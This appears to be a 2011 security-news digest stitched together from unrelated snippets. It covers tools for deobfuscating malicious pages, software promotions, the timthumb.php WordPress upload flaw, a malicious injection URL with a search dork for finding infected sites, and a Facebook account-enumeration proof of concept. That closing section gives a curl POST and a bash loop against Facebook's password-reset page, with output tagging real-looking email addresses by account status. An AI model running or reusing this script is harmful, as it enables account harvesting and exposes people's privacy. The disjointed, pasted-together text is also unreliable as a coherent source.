Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. Useful programs for use in exploring malicious pages:

* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/

nSpaces: Multiple virtual Desktops With Password Protection and easy switch
Fetures of nSpaces

Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.
Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique, Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t like to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t like anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you created, hotkey for the space switcher.You can change whatever you want.
Using Nspace is very easy and simple GUI based menu driven. Fast to configure and make changes and save.

Download
http://www.bytesignals.com/binary/nspaces/setup.exe

Fetures of websitedefender

Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security

Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php

These are the current features of Hexinject:

Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)

Download
http://sourceforge.net/projects/hexinject/files/

The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.

Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/

A Trojan spying on your conversations

Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx

C++ decompilation how to handle it in IDA and Hex-Rays decompiler. You can get the slides here
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here.
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation

New injection url is 1see[dot]ir/j/. Currently leading to a Best Pack exploit kit

Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/

Step by step:

- - Go to http://m.facebook.com

- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done

#+----- EOF ------+


You can ennumerate users by using a list of email address or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO

by
Zerial